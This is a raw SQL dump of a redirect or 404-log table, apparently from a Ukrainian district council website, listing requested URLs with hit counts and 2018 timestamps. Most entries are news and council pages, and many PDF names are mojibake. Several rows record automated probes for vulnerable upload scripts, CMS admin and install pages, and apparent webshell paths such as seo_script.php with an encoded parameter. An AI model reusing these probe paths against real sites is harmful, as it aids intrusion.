00:00:00',301),(32591,'https://malyn-rayrada.gov.ua/index.php/1676-turnir-z-mini-futbolu-pam-yat',NULL,'','',80,0,'2018-11-03 12:27:41','0000-00-00 00:00:00',301),(32592,'https://malyn-rayrada.gov.ua/index.php/deputatska-storinka/2011-03-31-12-03-04/1777-analiz-vplivu-regulyatornogo-aktu-proektu-rishennya-malinskoji-rajonnoji-radi-pro-timchasovij-poryadok-vidalennya-derev-ta-kushchiv-za-mezhami-naselenikh-punktiv-na-teritoriji-malinskoji-rajonu',NULL,'','',13,0,'2018-11-03 12:34:44','0000-00-00 00:00:00',301),(32593,'https://malyn-rayrada.gov.ua/index.php/1650-zakonodavchi-zmini-do-deyakikh-normativno-pravovikh-aktiv-u-sferi-zagalnoobov-yazkovogo-derzhavnogo-pensijnogo-strakhuvannya-z-1-sichnya-2017-roku?tmpl=component&print=1&layout=default&page=',NULL,'','',1,0,'2018-11-03 12:53:13','0000-00-00 00:00:00',301),(32594,'https://malyn-rayrada.gov.ua/index.php/1760-pensiji-za-cherven-profinansovano-na-76-1-misyachnoji-potrebi',NULL,'http://malyn-rayrada.gov.ua/index.php/1760-pensiji-za-cherven-profinansovano-na-76-1-misyachnoji-potrebi','',6,0,'2018-11-03 17:07:06','0000-00-00 00:00:00',301),(32595,'https://malyn-rayrada.gov.ua/hook-filters.php',NULL,'','',7,0,'2018-11-03 17:54:45','0000-00-00 00:00:00',301),(32596,'https://www.malyn-rayrada.gov.ua/modules/namamodule/uploadimage.php',NULL,'http://www.malyn-rayrada.gov.ua/modules/namamodule/uploadimage.php','',1,0,'2018-11-03 21:44:04','0000-00-00 00:00:00',301),(32597,'https://www.malyn-rayrada.gov.ua/attachments/article/2101/ð¿ñ–ð´ñ ñƒð¼ðºð¸ ð³ð¾ð»ð¾ñ ñƒð²ð°ð½ð½ñ .pdf',NULL,'','',3,0,'2018-11-04 05:55:10','0000-00-00 00:00:00',301),(32598,'https://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/11-2010-06-05-12-54-02',NULL,'','',23,0,'2018-11-04 06:09:45','0000-00-00 00:00:00',301),(32599,'https://malyn-rayrada.gov.ua/templates/protostar/js/templatedetails.php',NULL,'','',4,0,'2018-11-04 08:30:29','0000-00-00 00:00:00',301),(32600,'https://www.malyn-rayrada.gov.ua/index.php/1658-dopomozhemo-zhitelyam-avdijivki-razom',NULL,'','',15,0,'2018-11-04 15:20:58','0000-00-00 00:00:00',301),(32601,'https://www.malyn-rayrada.gov.ua/index.php/2041-vidnosno-pitannya-pererakhunku-pensij-z-1-lipnya-2018-roku',NULL,'','',15,0,'2018-11-04 20:06:30','0000-00-00 00:00:00',301),(32602,'https://www.malyn-rayrada.gov.ua/index.php/1587-upravlinnya-pensijnogo-fondu-ukrajini-v-malinskomu-rajoni-zhitomirskoji-oblasti-informue-3',NULL,'','',29,0,'2018-11-04 20:53:40','0000-00-00 00:00:00',301),(32603,'https://malyn-rayrada.gov.ua/search.php',NULL,'','',6,0,'2018-11-04 22:42:18','0000-00-00 00:00:00',301),(32604,'https://www.malyn-rayrada.gov.ua/index.php/1569-19-zhovtnya-na-bazi-malinskoji-dyussh-vidbuvsya-chempionat-rajonu-z-vilnoji-borotbi-sered-yunakiv-ta-divchat-2003-2006-r-n',NULL,'','',26,0,'2018-11-04 23:17:15','0000-00-00 00:00:00',301),(32605,'https://www.malyn-rayrada.gov.ua/index.php/1676-turnir-z-mini-futbolu-pam-yat',NULL,'','',36,0,'2018-11-05 00:46:55','0000-00-00 00:00:00',301),(32606,'https://malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/11-2010-06-05-12-54-02/22-kontaktna-informacija_2',NULL,'','',25,0,'2018-11-05 01:07:13','0000-00-00 00:00:00',301),(32607,'https://malyn-rayrada.gov.ua/index.php/1555-vidbuvsya-chempionat-zhitomirskoji-oblasti-z-boksu-sered-yunakiv',NULL,'','',64,0,'2018-11-05 01:10:19','0000-00-00 00:00:00',301),(32608,'https://malyn-rayrada.gov.ua/login',NULL,'','',3,0,'2018-11-05 03:56:27','0000-00-00 00:00:00',301),(32609,'https://www.malyn-rayrada.gov.ua/login',NULL,'','',2,0,'2018-11-05 03:56:27','0000-00-00 00:00:00',301),(32610,'https://malyn-rayrada.gov.ua/umbraco',NULL,'','',1,0,'2018-11-05 03:56:27','0000-00-00 00:00:00',301),(32611,'https://www.malyn-rayrada.gov.ua/umbraco',NULL,'','',1,0,'2018-11-05 03:56:28','0000-00-00 00:00:00',301),(32612,'https://malyn-rayrada.gov.ua/sitecore',NULL,'','',1,0,'2018-11-05 03:56:28','0000-00-00 00:00:00',301),(32613,'https://www.malyn-rayrada.gov.ua/sitecore',NULL,'','',1,0,'2018-11-05 03:56:28','0000-00-00 00:00:00',301),(32614,'https://www.malyn-rayrada.gov.ua/index.php/1588-informatsiya-shchodo-pidvishchennya-pensij',NULL,'','',38,0,'2018-11-05 05:37:21','0000-00-00 00:00:00',301),(32615,'https://www.malyn-rayrada.gov.ua/index.php/1695-malinskij-rajonnij-viddil-z-pitan-probatsiji-tsentralnogo-mizhregionalnogo-upravlinnya-z-pitan-vikonannya-kriminalnikh-pokaran-ta-probatsiji-ministerstva-yustitsiji',NULL,'','',21,0,'2018-11-05 05:37:33','0000-00-00 00:00:00',301),(32616,'https://www.malyn-rayrada.gov.ua/index.php/1687-informatsiya-iz-sportivnikh-zmagan',NULL,'','',32,0,'2018-11-05 06:30:29','0000-00-00 00:00:00',301),(32617,'https://www.malyn-rayrada.gov.ua/index.php/1541-den-sela-v-novikh-vorob-yakh-fotoreportazh',NULL,'','',32,0,'2018-11-05 06:31:21','0000-00-00 00:00:00',301),(32618,'https://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/10-2010-06-05-12-53-35',NULL,'','',21,0,'2018-11-05 07:51:01','0000-00-00 00:00:00',301),(32619,'https://www.malyn-rayrada.gov.ua/index.php/2057-kharchovi-otruennya-ta-jikh-profilaktika',NULL,'','',18,0,'2018-11-05 09:36:24','0000-00-00 00:00:00',301),(32620,'https://www.malyn-rayrada.gov.ua/index.php/1524-25-rokiv-nezalezhnosti',NULL,'','',8,0,'2018-11-05 09:37:28','0000-00-00 00:00:00',301),(32621,'https://www.malyn-rayrada.gov.ua/index.php/1608-nagorodzhennya-chempiona-fk-budivelnik-granitne',NULL,'','',8,0,'2018-11-05 10:24:12','0000-00-00 00:00:00',301),(32622,'https://www.malyn-rayrada.gov.ua/index.php/1663-nekrolog',NULL,'','',1,0,'2018-11-05 12:07:54','0000-00-00 00:00:00',301),(32623,'https://malyn-rayrada.gov.ua/indes.php',NULL,'','',5,0,'2018-11-05 12:39:08','0000-00-00 00:00:00',301),(32624,'https://malyn-rayrada.gov.ua/index.php/1658-dopomozhemo-zhitelyam-avdijivki-razom',NULL,'','',74,0,'2018-11-05 15:08:37','0000-00-00 00:00:00',301),(32625,'https://malyn-rayrada.gov.ua/index.php/1670-upravlinnya-pf-ukrajini-v-malinskomu-rajoni-informue?tmpl=component&print=1&layout=default',NULL,'','',1,0,'2018-11-05 15:08:44','0000-00-00 00:00:00',301),(32626,'https://malyn-rayrada.gov.ua/index.php/2079-pro-sklikannya-26-sesiji-rajonnoji-radi-7-sklikannya',NULL,'','',61,0,'2018-11-05 15:57:04','0000-00-00 00:00:00',301),(32627,'https://malyn-rayrada.gov.ua/attachments/article/2040/ð›ñƒðºñ–ð²ñ ñœðºñ–ð¹ ñ ñ–ð»ñœñ ñœðºñ–ð¹ ñ€ð°ð´ñ– 95compressed.pdf',NULL,'','',2,0,'2018-11-05 18:47:12','0000-00-00 00:00:00',301),(32628,'https://www.malyn-rayrada.gov.ua/attachments/article/1564/ð†ð½ñ„ð¾ñ€ð¼ð°ñ†ñ–ñ  ð¿ñ€ð¾ðºñƒñ€.pdf',NULL,'','',2,0,'2018-11-05 18:51:42','0000-00-00 00:00:00',301),(32629,'https://www.malyn-rayrada.gov.ua/attachments/article/1572/ðÿñ–ð´ñ ñƒð¼ðºð¸ ð²ñ–ð´ðºñ€ð¸ñ‚ð¾ð³ð¾ ð³ð¾ð»ð¾ñ ñƒð²ð°ð½ð½ñ  10 ñ ðµñ ñ–ñ 7.pdf',NULL,'','',2,0,'2018-11-05 18:52:34','0000-00-00 00:00:00',301),(32630,'https://malyn-rayrada.gov.ua/index.php/1414-malinska-odpi-informue',NULL,'http://malyn-rayrada.gov.ua/index.php/1414-malinska-odpi-informue','',12,0,'2018-11-06 02:36:06','0000-00-00 00:00:00',301),(32631,'https://malyn-rayrada.gov.ua/wp-cache.php',NULL,'','',6,0,'2018-11-06 03:12:44','0000-00-00 00:00:00',301),(32632,'https://malyn-rayrada.gov.ua/index.php?option=com_easyblog&view=dashboard&layout=write',NULL,'https://malyn-rayrada.gov.ua/','',8,0,'2018-11-06 14:15:18','0000-00-00 00:00:00',301),(32633,'https://www.malyn-rayrada.gov.ua/index.php/1827-vistup-yunikh-bortsiv',NULL,'','',24,0,'2018-11-06 16:41:19','0000-00-00 00:00:00',301),(32634,'https://malyn-rayrada.gov.ua/wp-includes/css/modules.php',NULL,'','',4,0,'2018-11-06 17:41:34','0000-00-00 00:00:00',301),(32635,'https://malyn-rayrada.gov.ua/system/logs/seo_script.php?jweyc=b37667b627b392d522b622b574642584442554f5428297e69627',NULL,'','',1,0,'2018-11-07 06:06:23','0000-00-00 00:00:00',301),(32636,'https://malyn-rayrada.gov.ua/attachments/article/1431/ðÿñ–ð´ñ ñƒð¼ðºð¸ ð²ñ–ð´ðºñ€ð¸ñ‚ð¾ð³ð¾ ð¿ð¾ñ–ð¼ðµð½ð½ð¾ð³ð¾ ð³ð¾ð»ð¾ñ ñƒð²ð°ð½ð½ñ .pdf',NULL,'','',2,0,'2018-11-07 07:53:28','0000-00-00 00:00:00',301),(32637,'https://www.malyn-rayrada.gov.ua/index.php/1993-ogoloshennya-pro-seminar',NULL,'','',12,0,'2018-11-07 11:49:27','0000-00-00 00:00:00',301),(32638,'https://malyn-rayrada.gov.ua/system/storage/logs/seo_script.php?jweyc=b37667b627b392d522b622b574642584442554f5428297e69627',NULL,'','',1,0,'2018-11-07 11:57:49','0000-00-00 00:00:00',301),(32639,'https://malyn-rayrada.gov.ua/cache/seo_script.php?jweyc=b37667b627b392d522b622b574642584442554f5428297e69627',NULL,'','',1,0,'2018-11-07 17:47:14','0000-00-00 00:00:00',301),(32640,'https://malyn-rayrada.gov.ua/attachments/article/2066/ð“ð¾ð»ð¾ñ ñƒð²ð°ð½ð½ñ .pdf',NULL,'','',2,0,'2018-11-07 19:35:03','0000-00-00 00:00:00',301),(32641,'https://www.malyn-rayrada.gov.ua/index.php/1665-z-1-sichnya-startuvala-deklaratsijna-kampaniya-2018',NULL,'','',10,0,'2018-11-07 22:24:42','0000-00-00 00:00:00',301),(32642,'https://www.malyn-rayrada.gov.ua/index.php/1725-viddil-kulturi-malinskoji-rajderzhadministratsiji-ogoloshue-pro-namir-peredati-nerukhome-majno-v-orendu-2',NULL,'','',16,0,'2018-11-07 22:38:35','0000-00-00 00:00:00',301),(32643,'https://www.malyn-rayrada.gov.ua/index.php/1823-ogoloshennya-4',NULL,'','',21,0,'2018-11-08 00:42:09','0000-00-00 00:00:00',301),(32644,'https://www.malyn-rayrada.gov.ua/attachments/article/1691/ð¿ñ–ð´ñ ñƒð¼ðºð¸ ð²ñ–ð´ðºñ€ð¸ñ‚ð¾ð³ð¾ ð³ð¾ð»ð¾ñ ñƒð²ð°ð½ð½ñ 1.pdf',NULL,'','',3,0,'2018-11-08 05:29:15','0000-00-00 00:00:00',301),(32645,'https://www.malyn-rayrada.gov.ua/attachments/article/1633/ð¿ñ–ð´ñ ñƒð¼ðºð¸ ð³ð¾ð»ð¾ñ ñƒð²ð°ð½ð½ñ  14-7.pdf',NULL,'','',4,0,'2018-11-08 05:45:49','0000-00-00 00:00:00',301),(32646,'https://malyn-rayrada.gov.ua/attachments/article/1444/ðÿñ–ð´ñ ñƒð¼ðºð¸ ð²ñ–ð´ðºñ€ð¸ñ‚ð¾ð³ð¾ ð¿ð¾ñ–ð¼ðµð½ð½ð¾ð³ð¾ ð³ð¾ð»ð¾ñ ñƒð²ð°ð½ð½ñ _130516.pdf',NULL,'','',2,0,'2018-11-08 06:49:02','0000-00-00 00:00:00',301),(32647,'https://malyn-rayrada.gov.ua/img src=\'//old.kurs.com.ua/static/images/informer/kurs.png\' width=\'52\' height=\'26\' alt=\'kurs.com.ua: курс валют в украине!\' title=\'курс валют\' border=\'0\' /',NULL,'','',193,0,'2018-11-08 21:45:02','0000-00-00 00:00:00',301),(32648,'https://www.malyn-rayrada.gov.ua/img src=\'//old.kurs.com.ua/static/images/informer/kurs.png\' width=\'52\' height=\'26\' alt=\'kurs.com.ua: курс валют в украине!\' title=\'курс валют\' border=\'0\' /',NULL,'','',100,0,'2018-11-08 21:54:45','0000-00-00 00:00:00',301),(32649,'https://www.malyn-rayrada.gov.ua/user/login',NULL,'','',6,0,'2018-11-09 02:07:16','0000-00-00 00:00:00',301),(32650,'https://www.malyn-rayrada.gov.ua/wp-login.php',NULL,'','',19,0,'2018-11-09 02:07:17','0000-00-00 00:00:00',301),(32651,'https://www.malyn-rayrada.gov.ua/wp-admin/setup-config.php',NULL,'','',6,0,'2018-11-09 02:07:23','0000-00-00 00:00:00',301),(32652,'https://www.malyn-rayrada.gov.ua/wp-admin/install.php',NULL,'','',6,0,'2018-11-09 02:07:27','0000-00-00 00:00:00',301),(32653,'https://www.malyn-rayrada.gov.ua/installation/index.php',NULL,'','',6,0,'2018-11-09 02:07:28','0000-00-00 00:00:00',301),(32654,'https://www.malyn-rayrada.gov.ua/admin',NULL,'','',6,0,'2018-11-09 02:07:29','0000-00-00 00:00:00',301),(32655,'https://www.malyn-rayrada.gov.ua/admin/login.php',NULL,'','',8,0,'2018-11-09 02:07:33','0000-00-00 00:00:00',301),(32656,'https://www.malyn-rayrada.gov.ua/modules/vtemslideshow/uploadimage.php',NULL,'http://www.malyn-rayrada.gov.ua/modules/vtemslideshow/uploadimage.php','',1,0,'2018-11-09 08:02:55','0000-00-00 00:00:00',301),(32657,'https://www.malyn-rayrada.gov.ua/index.php/1805-pro-sklikannya-20-sesiji-rajonnoji-radi-7-sklikannya',NULL,'','',6,0,'2018-11-09 12:44:29','0000-00-00 00:00:00',301),(32658,'https://www.malyn-rayrada.gov.ua/index.php/2079-pro-sklikannya-26-sesiji-rajonnoji-radi-7-sklikannya',NULL,'','',26,0,'2018-11-09 16:07:04','0000-00-00 00:00:00',301),(32659,'https://www.malyn-rayrada.gov.ua/index.php/1607-pro-sklikannya-14-sesiji-rajonnoji-radi-7-sklikannya',NULL,'','',3,0,'2018-11-09 21:11:49','0000-00-00 00:00:00',301),(32660,'https://www.malyn-rayrada.gov.ua/attachments/article/1893/ð·ð²ñ–ñ‚ ð¾ñ€ð³ð°ð½ñ–ð·ð°ñ†ñ–ñ… ð²ðµñ‚ðµñ€ð°ð½ñ–ð².pdf',NULL,'','',3,0,'2018-11-10 06:55:26','0000-00-00 00:00:00',301),(32661,'https://malyn-rayrada.gov.ua/attachments/article/1893/ð·ð²ñ–ñ‚ ð¾ñ€ð³ð°ð½ñ–ð·ð°ñ†ñ–ñ… ð²ðµñ‚ðµñ€ð°ð½ñ–ð².pdf',NULL,'','',6,0,'2018-11-10 06:56:06','0000-00-00 00:00:00',301),(32662,'https://malyn-rayrada.gov.ua/attachments/article/2060/ð¿ð¸ñ‚ð°ð½ð½ñ  ð¢ð¾ð¼ð¾ñ ñƒ.pdf',NULL,'','',2,0,'2018-11-10 20:12:20','0000-00-00 00:00:00',301),(32663,'https://www.malyn-rayrada.gov.ua/index.php/1662-do-vidoma-robotodavtsiv',NULL,'','',21,0,'2018-11-11 01:30:55','0000-00-00 00:00:00',301),(32664,'https://www.malyn-rayrada.gov.ua/index.php/1985-pro-sklikannya-24-sesiji-rajonnoji-radi-7-sklikannya',NULL,'','',13,0,'2018-11-11 07:38:12','0000-00-00 00:00:00',301),(32665,'https://www.malyn-rayrada.gov.ua/index.php/1991-oberezhno-klishchi',NULL,'','',11,0,'2018-11-11 15:51:13','0000-00-00 00:00:00',301),(32666,'https://malyn-rayrada.gov.ua/manager/index.php',NULL,'http://malyn-rayrada.gov.ua/manager/index.php','',1,0,'2018-11-11 16:12:21','0000-00-00 00:00:00',301),(32667,'https://malyn-rayrada.gov.ua/attachments/article/2037/ð¿ñ–ð´ñ ñƒð¼ðºð¸ ð³ð¾ð»ð¾ñ ñƒð² 24 ñ ðµñ ñ–ñ  15062018.pdf',NULL,'','',2,0,'2018-11-12 19:32:30','0000-00-00 00:00:00',301),(32668,'https://www.malyn-rayrada.gov.ua/attachments/article/1506/ðÿñ–ð´ñ ñƒð¼ðºð¸ ð²ñ–ð´ðºñ€ð¸ñ‚ð¾ð³ð¾ ð¿ð¾ñ–ð¼ðµð½ð½ð¾ð³ð¾ ð³ð¾ð»ð¾ñ ñƒð²ð°ð½ð½ñ  8 ñ ðµñ ñ–ñ .pdf',NULL,'','',2,0,'2018-11-13 06:29:11','0000-00-00 00:00:00',301),(32669,'https://www.malyn-rayrada.gov.ua/attachments/article/1702/ñ€ðµð·ñƒð»ñœñ‚ð°ñ‚ð¸ 22032017.pdf',NULL,'','',10,0,'2018-11-13 07:22:20','0000-00-00 00:00:00',301),(32670,'https://www.malyn-rayrada.gov.ua/attachments/article/1638/ðÿð¾ñ–ð¼ðµð½ð½ðµ ð³ð¾ð»ð¾ñ ñƒð²ð°ð½ð½ñ  14.pdf',NULL,'','',2,0,'2018-11-13 08:12:08','0000-00-00 00:00:00',301),(32671,'https://www.malyn-rayrada.gov.ua/index.php/1615-afrikanska-chuma-svinej-na-zhitomirshchini',NULL,'','',20,0,'2018-11-14 04:05:14','0000-00-00 00:00:00',301),(32672,'https://www.malyn-rayrada.gov.ua/index.php/1566-viddil-kulturi-malinskoji-rajderzhadministratsiji-ogoloshue-pro-namir-peredati-nerukhome-majno-v-orendu',NULL,'','',15,0,'2018-11-14 04:55:15','0000-00-00 00:00:00',301),(32673,'https://www.malyn-rayrada.gov.ua/attachments/article/1883/ð¿ñ–ð´ñ ñƒð¼ðºð¸ ð³ð¾ð»ð¾ñ ñƒð²ð°ð½ð½ñ  21-7.pdf',NULL,'','',2,0,'2018-11-14 06:18:58','0000-00-00 00:00:00',301),(32674,'https://www.malyn-rayrada.gov.ua/index.php/1585-kerivnik-rajonnoji-dyussh-anatolij-tishchenko-informue',NULL,'','',16,0,'2018-11-14 18:07:45','0000-00-00 00:00:00',301),(32675,'https://www.malyn-rayrada.gov.ua/index.php/1656-ogoloshennya-pro-konkurs-na-zamishchennya-vakantnoji-posadi-direktora-komunalnogo-zakladu-rajonnij-budinok-kulturi-malinskoji-rajonnoji-radi',NULL,'','',8,0,'2018-11-14 18:24:27','0000-00-00 00:00:00',301),(32676,'https://malyn-rayrada.gov.ua/attachments/article/1838/ð¿ñ–ð´ñ ñƒð¼ðºð¸ ð¿ð¾ñ–ð¼ðµð½ð½ð¾ð³ð¾ ð³ð¾ð»ð¾ñ ñƒð²ð°ð½ð½ñ .pdf',NULL,'','',2,0,'2018-11-14 18:31:46','0000-00-00 00:00:00',301),(32677,'https://www.malyn-rayrada.gov.ua/attachments/article/1531/ðÿñ–ð´ñ ñƒð¼ðºð¸ ð²ñ–ð´ðºñ€ð¸ñ‚ð¾ð³ð¾ ð¿ð¾ñ–ð¼ðµð½ð½ð¾ð³ð¾ ð³ð¾ð»ð¾ñ ñƒð²ð°ð½ð½ñ  9 ñ ðµñ ñ–ñ .pdf',NULL,'','',17,0,'2018-11-14 19:37:34','0000-00-00 00:00:00',301),(32678,'https://www.malyn-rayrada.gov.ua/index.php/781-vipadkove-foto',NULL,'','',4,0,'2018-11-15 02:44:46','0000-00-00 00:00:00',301),(32679,'https://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/1849-pro-zatverdzhennya-spilnikh-rozporyadzhen-golovi-rajonnoji-derzhavnoji-administratsiji-golovi-rajonnoji-radi',NULL,'','',5,0,'2018-11-15 04:30:36','0000-00-00 00:00:00',301),(32680,'https://www.malyn-rayrada.gov.ua/index.php/1760-pensiji-za-cherven-profinansovano-na-76-1-misyachnoji-potrebi',NULL,'','',6,0,'2018-11-15 04:45:28','0000-00-00 00:00:00',301),(32681,'https://www.malyn-rayrada.gov.ua/index.php/1536-vidbuvsya-turnir-iz-mini-futbolu',NULL,'','',26,0,'2018-11-15 04:52:21','0000-00-00 00:00:00',301),(32682,'https://www.malyn-rayrada.gov.ua/index.php/1765-pro-sklikannya-18-sesiji-rajonnoji-radi-7-sklikannya',NULL,'','',8,0,'2018-11-15 05:09:39','0000-00-00 00:00:00',301),(32683,'https://www.malyn-rayrada.gov.ua/index.php/1840-pro-sklikannya-21-sesiji-rajonnoji-radi-7-sklikannya',NULL,'','',8,0,'2018-11-15 05:10:16','0000-00-00 00:00:00',301),(32684,'https://www.malyn-rayrada.gov.ua/index.php/1616-chempionat-oblasti-z-vilnoji-borotbi',NULL,'','',22,0,'2018-11-15 05:42:29','0000-00-00 00:00:00',301),(32685,'https://www.malyn-rayrada.gov.ua/index.php/1532-dlya-shkolyariv-lyubovitskoji-gromadi-tezh-prodzveniv-pershij-dzvinok',NULL,'','',19,0,'2018-11-15 05:44:02','0000-00-00 00:00:00',301),(32686,'https://www.malyn-rayrada.gov.ua/index.php/1650-zakonodavchi-zmini-do-deyakikh-normativno-pravovikh-aktiv-u-sferi-zagalnoobov-yazkovogo-derzhavnogo-pensijnogo-strakhuvannya-z-1-sichnya-2017-roku',NULL,'','',20,0,'2018-11-15 05:51:47','0000-00-00 00:00:00',301),(32687,'https://www.malyn-rayrada.gov.ua//wp-login.php',NULL,'http://www.google.com.hk','',7,0,'2018-11-15 06:26:03','0000-00-00 00:00:00',301),(32688,'https://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/10-2010-06-05-12-53-35/21-kontaktna-informacija',NULL,'','',7,0,'2018-11-15 06:35:05','0000-00-00 00:00:00',301),(32689,'https://www.malyn-rayrada.gov.ua/index.php/1640-vitaemo-z-zhiteliv-malinshchini-z-novim-rokom-ta-rizdvom-khristovim?tmpl=component&print=1&layout=default',NULL,'','',2,0,'2018-11-15 06:49:19','0000-00-00 00:00:00',301),(32690,'https://www.malyn-rayrada.gov.ua/index.php/1655-nashi-sportsmeni-pokazali-klas-2',NULL,'','',17,0,'2018-11-15 06:58:19','0000-00-00 00:00:00',301),(32691,'https://www.malyn-rayrada.gov.ua/attachments/article/1753/ð¿ñ–ð´ñ ñƒð¼ðºð¸ ð²ñ–ð´ðºñ€ð¸ñ‚ð¾ð³ð¾ ð³ð¾ð»ð¾ñ ñƒð²ð°ð½ð½ñ .pdf',NULL,'','',2,0,'2018-11-15 07:04:55','0000-00-00 00:00:00',301),(32692,'https://www.malyn-rayrada.gov.ua/index.php/1545-vshanuvali-lyudej-pokhilogo-viku',NULL,'','',23,0,'2018-11-15 08:44:47','0000-00-00 00:00:00',301),(32693,'https://www.malyn-rayrada.gov.ua/index.php/1745-do-vidoma-deputativ-rajonnoji-radi-2',NULL,'','',8,0,'2018-11-15 08:51:44','0000-00-00 00:00:00',301),(32694,'https://www.malyn-rayrada.gov.ua/index.php/1077-detsentralizatsiya-2015',NULL,'','',5,0,'2018-11-15 09:13:00','0000-00-00 00:00:00',301),(32695,'https://www.malyn-rayrada.gov.ua/index.php/1123-20-chervnya-na-malinshchini-pokhovali-geroya-ato-vasilya-baranivskogo',NULL,'','',5,0,'2018-11-15 09:21:50','0000-00-00 00:00:00',301),(32696,'https://www.malyn-rayrada.gov.ua/index.php/1371-kajdasheva-sim-ya-u-vikonanni-artistiv-chopovitskoji-gromadi',NULL,'','',4,0,'2018-11-15 09:28:33','0000-00-00 00:00:00',301),(32697,'https://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/1490-pro-vnesennya-zmin-ta-zatverdzhennya-u-novij-redaktsiji-statutiv-komunalnikh-zakladiv-kulturi',NULL,'','',5,0,'2018-11-15 10:00:41','0000-00-00 00:00:00',301),(32698,'https://www.malyn-rayrada.gov.ua/index.php/899-zastupnik-keruyuchogo-malinskogo-viddilennya-oshchadbanku-svitlana-mikhajlenko-informue-pro-programu-pridbannya-kotliv',NULL,'','',7,0,'2018-11-15 10:31:58','0000-00-00 00:00:00',301),(32699,'https://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/1789-pro-peredachu-primishchennya-buvshoji-vishivskoji-zosh-i-ii-stupeniv-u-komunalnu-vlasnist-teritorialnoji-gromadi-vishivskoji-silskoji-radi',NULL,'','',5,0,'2018-11-15 10:47:10','0000-00-00 00:00:00',301),(32700,'https://www.malyn-rayrada.gov.ua/index.php/1742-upravlinnya-derzhprodspozhivsluzhbi-v-malinskomu-rajoni-zasterigae',NULL,'','',6,0,'2018-11-15 11:01:45','0000-00-00 00:00:00',301),(32701,'https://www.malyn-rayrada.gov.ua/index.php/1590-spivchuttya-kolezi',NULL,'','',7,0,'2018-11-15 11:20:01','0000-00-00 00:00:00',301),(32702,'https://www.malyn-rayrada.gov.ua/index.php/1825-plan-grafik-provedennya-zasidan-postijnikh-komisij-malinskoji-rajonnoji-radi-po-rozglyadu-pitan-yaki-vinosyatsya-na-20-sesiyu-rajonnoji-radi-7-sklikannya',NULL,'','',6,0,'2018-11-15 11:34:50','0000-00-00 00:00:00',301),(32703,'https://www.malyn-rayrada.gov.ua/index.php/1578-bazhaemo-egoru-peremogi-na-chempionati-evropi',NULL,'','',20,0,'2018-11-15 12:49:21','0000-00-00 00:00:00',301),(32704,'https://www.malyn-rayrada.gov.ua/index.php/1721-pro-sklikannya-17-sesiji-rajonnoji-radi-7-sklikannya',NULL,'','',6,0,'2018-11-15 13:29:31','0000-00-00 00:00:00',301),(32705,'https://www.malyn-rayrada.gov.ua/index.php/1720-zakonodavchi-zmini-v-pensijnomu-zabezpechenni-z-01-05-2017',NULL,'','',15,0,'2018-11-15 14:12:18','0000-00-00 00:00:00',301),(32706,'https://www.malyn-rayrada.gov.ua/index.php/1589-obchislennya-stazhu-shcho-dae-pravo-na-priznachennya-pensiji-za-vikom-na-pilgovikh-umovakh-za-spiskom-1-ta-2',NULL,'','',22,0,'2018-11-15 14:27:35','0000-00-00 00:00:00',301),(32707,'https://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/11-2010-06-05-12-54-02/22-kontaktna-informacija_2',NULL,'','',10,0,'2018-11-15 14:33:42','0000-00-00 00:00:00',301),(32708,'https://www.malyn-rayrada.gov.ua/index.php/1252-upravlinnya-pensijnogo-fondu-ukrajini-v-malinskomu-rajoni-pidvishchennya-pensij-z-01-veresnya-2015-roku-vidbulos-ne-dlya-vsikh-kategorij',NULL,'','',6,0,'2018-11-15 14:50:17','0000-00-00 00:00:00',301),(32709,'https://www.malyn-rayrada.gov.ua/index.php/1562-vitaemo-iz-svyatami-dnem-zakhisnika-ukrajini-ta-pokrovoyu-presvyatoji-bogoroditsi-2',NULL,'','',21,0,'2018-11-15 15:17:48','0000-00-00 00:00:00',301),(32710,'https://www.malyn-rayrada.gov.ua/index.php/1055-roz-yasnennya-shchodo-otrimannya-subsidij',NULL,'','',8,0,'2018-11-15 15:26:00','0000-00-00 00:00:00',301),(32711,'https://www.malyn-rayrada.gov.ua/index.php/1546-vibori-pirizhkivskogo-silskogo-golovi-4-grudnya-2016-roku?tmpl=component&print=1&layout=default',NULL,'','',2,0,'2018-11-15 15:47:28','0000-00-00 00:00:00',301),(32712,'https://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/1813-pro-vshanuvannya-pam-yati-zhertv-tragediji-virmenskogo-narodu',NULL,'','',6,0,'2018-11-15 16:22:55','0000-00-00 00:00:00',301),(32713,'https://www.malyn-rayrada.gov.ua/index.php/1469-komunalne-pidpriemstvo-malinska-rajonna-drukarnya-ogoloshue-pro-namir-peredati-nerukhome-majno-v-orendu',NULL,'','',7,0,'2018-11-15 16:41:22','0000-00-00 00:00:00',301),(32714,'https://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/1470-pro-likvidatsiyu-pristantsijnoji-zosh-i-ii-stupeniv',NULL,'','',7,0,'2018-11-15 16:59:16','0000-00-00 00:00:00',301),(32715,'https://www.malyn-rayrada.gov.ua/attachments/article/1583/ðÿñ–ð´ñ ñƒð¼ðºð¸ ð²ñ–ð´ðºñ€ð¸ñ‚ð¾ð³ð¾ ð³ð¾ð»ð¾ñ ñƒð²ð°ð½ð½ñ  12 ð¿ð¾ð·ð°ñ‡ðµñ€ð³ð¾ð²ð° ñ ðµñ ñ–ñ 7.pdf',NULL,'','',23,0,'2018-11-15 17:36:36','0000-00-00 00:00:00',301),(32716,'https://www.malyn-rayrada.gov.ua/index.php/1609-vidbulas-13-pozachergova-sesiya-rajonnoji-radi',NULL,'','',13,0,'2018-11-15 18:06:22','0000-00-00 00:00:00',301),(32717,'https://www.malyn-rayrada.gov.ua/index.php/1513-ksaverivska-silska-rada-informue-shchodo-proektiv-regulyatornikh-aktiv',NULL,'','',8,0,'2018-11-15 18:10:56','0000-00-00 00:00:00',301),(32718,'https://malyn-rayrada.gov.ua/attachments/article/1691/ð¿ñ–ð´ñ ñƒð¼ðºð¸ ð²ñ–ð´ðºñ€ð¸ñ‚ð¾ð³ð¾ ð³ð¾ð»ð¾ñ ñƒð²ð°ð½ð½ñ 1.pdf',NULL,'','',2,0,'2018-11-15 18:26:29','0000-00-00 